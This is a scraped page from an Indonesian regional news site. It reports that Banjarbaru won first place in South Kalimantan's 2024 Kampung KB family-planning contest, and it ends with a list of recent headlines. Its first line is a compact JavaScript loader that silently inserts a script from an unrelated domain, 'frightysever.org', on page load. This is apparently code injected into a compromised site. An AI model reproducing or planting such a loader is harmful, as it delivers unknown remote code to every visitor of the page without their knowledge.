(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Juara Pertama Kampung KB 2024 Jadi Kado Hari Jadi ke-25 Kota Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Sebuah kado dihadirkan untuk Kota Banjarbaru pada usia 25 tahun. Kota Banjarbaru berhasil meraih gelar juara pertama Kampung Keluarga Berkualitas (Kampung KB) tingkat Provinsi Kalimantan Selatan (Kalsel) tahun 2024. Penghargaan itu diberikan Badan Kependudukan dan Keluarga Berencana Nasional (BKKBN) RI.

Secara langsung diserahkan Kepala BKKBN RI, Dr (HC) dr Hasto Wardoyo kepada Wali Kota Aditya yang diwakili Asisten 1 Abdul Basid dalam acara Rapat Kerja Daerah (Rakerda) Program Bangga Kencana dan Percepatan Penurunan Stunting di Hotel Rattan Inn, Banjarmasin, Kamis (18/4/2024) siang.

Wali Kota Aditya mengungkapkan rasa syukur atas prestasi yang diraih Kota Banjarbaru lewat gelar juara pertama Kampung KB tingkat Provinsi Kalsel kategori kota tahun 2024. Menurut Aditya, prestasi ini akan semakin menambah warna serta euforia bertepatan dengan momentum Hari Jadi ke-25 Kota Banjarbaru.

“Masyarakat Kota Banjarbaru harus berbangga. Prestasi Kota Banjarbaru dari tahun ke tahun terus bertambah. Artinya Banjarbaru semakin diakui atas kemajuan dan perkembangannya,” ucapnya.

Baca juga: Wakil Rakyat DPRD Kapuas Ikuti Bimtek Implementasi Perpres 53

Adapun raihan prestasi juara Kampung KB Tingkat Provinsi Kalsel yang diberikan BKKBN RI kepada Kota Banjarbaru merupakan hasil dari kerja keras Kampung KB Kelurahan Guntung Manggis di Komplek Wengga IV RT 44 RW 07. Atas prestasi ini pula Kota Banjarbaru akan mewakili Provinsi Kalsel ke tingkat nasional.

Wali Kota Aditya sangat mengapresiasi Kampung KB di Kelurahan Guntung Manggis. Termasuk dukungan lewat pendampingan yang dilakukan oleh SKPD di Pemko Banjarbaru dan pihak lain terkait.

“Harapan kita, usaha dan kerja keras ini akan kembali membuahkan hasil di nasional nantinya. Insyaallah, hasil terbaik akan kita dapatkan,” lanjutnya.

Sekadar diketahui, program Kampung KB merupakan salah satu inovasi strategis dengan menjadi model miniatur pelaksanaan program Kependudukan, Keluarga Berencana, dan Pembangunan Keluarga (KKBPK), kesehatan, pendidikan, sosial, serta ekonomi.

Baca juga: Salat Hajat dan Doa Bersama Hari Jadi ke-25 Kota Banjarbaru

Tujuan lain dari Kampung KB adalah memenuhi kebutuhan untuk meningkatkan kualitas hidup masyarakat, sehingga memiliki ketahanan dan kesejahteraan lebih baik. Karena itu, intervensi kegiatan di Kampung KB harus disesuaikan dengan kondisi masyarakat dan diperlukan juga data sebagai dasar perencanaan dan penyusunan kegiatan (baseline data).

“Keberhasilan Kota Banjarbaru dalam melaksanakan program Kampung KB merupakan bukti bahwa Pemko Banjarbaru begitu serius dalam memenuhi kebutuhan untuk meningkatkan kualitas hidup masyarakat. Semoga manfaatnya benar-benar dirasakan masyarakat Kota Banjarbaru,” tuntas Wali Kota Aditya. (Kanalkalimantan.com/bie)

Reporter: bie
Editor: kk


Risa

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

2 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

4 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

6 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

7 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

9 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

10 jam ago

This website uses cookies.